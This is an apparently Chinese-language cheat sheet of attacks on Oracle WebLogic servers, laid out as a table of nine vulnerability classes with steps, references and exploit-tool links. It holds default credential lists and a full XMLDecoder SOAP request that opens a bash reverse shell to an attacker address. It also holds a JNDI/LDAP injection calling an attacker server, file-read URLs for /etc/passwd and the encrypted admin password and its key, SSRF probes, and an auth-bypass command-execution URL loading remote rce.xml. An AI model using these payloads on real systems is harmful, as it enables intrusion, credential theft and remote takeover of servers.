weblogic漏洞汇总

 

ID	技术描述	利用场景/条件	过程	参考	武器库关联
S1	Weblogic弱口令漏洞	进入后台登录处	2.1 后台登录地址 输入 http://your-ip:7001/console 即可进入后台 2.2 Weblogic常见弱口令总结 Copy system:password weblogic:weblogic admin:secruity joe:password mary:password system:sercurity wlcsystem: wlcsystem weblogic:Oracle@123 https://cirt.net/passwords?criteria=weblogic	https://www.cnblogs.com/-mo-/p/11503707.html	https://github.com/rabbitmask/WeblogicScan
S2	基于T3协议的漏洞	CVE-2015-4582 CVE-2016-0638 CVE-2016-3510 CVE-2018-2628 CVE-2020-2555 CVE-2020-2883	这些CVE可以直接用weblogic工具扫描识别出来，工具在右侧已附上	https://www.cnblogs.com/nice0e3/p/14201884.html	https://github.com/rabbitmask/WeblogicScan
S3	基于xml解析的漏洞	CVE-2017-3506 CVE-2017-10271 weblogic10.03	POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.1.15:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 637 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i &gt;&amp; /dev/tcp/192.168.1.31/4444 0&gt;&amp;1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>	https://zhuanlan.zhihu.com/p/33403692 https://blog.csdn.net/qq_29647709/article/details/84928306	https://github.com/rabbitmask/WeblogicScan
S4	基于IIOP的漏洞	CVE-2020-2551 CVE-2020-14644	可利用POC验证漏洞	https://xz.aliyun.com/t/7422?page=1 https://github.com/Y4er/CVE-2020-2551	https://github.com/rabbitmask/WeblogicScan
S5	基于LDAP的漏洞	CVE-2021-2109 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0	1.未授权访问地址：http://ip:7001/console/css/%252e%252e%252f/consolejndi.portalPOST /console/css/%252e%252e/consolejndi.portal? 2.启动LDAP：https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 unzip JNDIExploit.v1.11.zip java -jar JNDIExploit.v1.11.jar -i ip(攻击机地址)启动 3.漏洞利用： _pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1 Host: ip:7001 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0	https://dyblogs.cn/dy/2404.html	https://github.com/welk1n/JNDI-Injection-Exploit
S6	任意文件上传	10.3.6.0，12.1.3.0，12.2.1.2，12.2.1.3	begin.do页面上传漏洞 http://IP:7001/ws_utc/resources/ws/config/import?timestamp=1532403983779 config.do页面上传漏洞 真正存在上传漏洞的地址：  http://IP:7001/ws_utc/config.do	https://www.freebuf.com/vuls/178510.html
S7	任意文件读取+文件上传   CVE-2019-2618	WebLogic 10.3.6.0、12.1.3.0、12.2.1.3	1.任意文件读取 访问url (http://IP:7001/hello/file.jsp?path=/etc/passwd) , 成功读取到账号和密码 weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，这就是密钥，右键copy to file就可以保存成一个文件： http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat  config.xml是base_domain的全局配置文件，所以乱七八糟的内容比较多，找到其中的的值，即为加密后的管理员密码(需要下载工具进行解密) http://yourIP:7001/hello/file.jsp?path=config/config.xml	https://www.jianshu.com/p/7d14e45a96e7	https://github.com/TideSec/Decrypt_Weblogic_Password
S8	SSRF	10.0.2~10.3.6	http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:1234 http://192.168.153.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001	https://dyblogs.cn/dy/2275.html https://www.cnblogs.com/-mo-/p/11503707.html
S9	权限绕过+命令执行	Weblogic_CVE-2020-14882/14883	http://your-ip:7001/console/css/%252e%252e%252fconsole.portal http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")	https://blog.csdn.net/weixin_28975553/article/details/116535611 https://www.anquanke.com/post/id/221752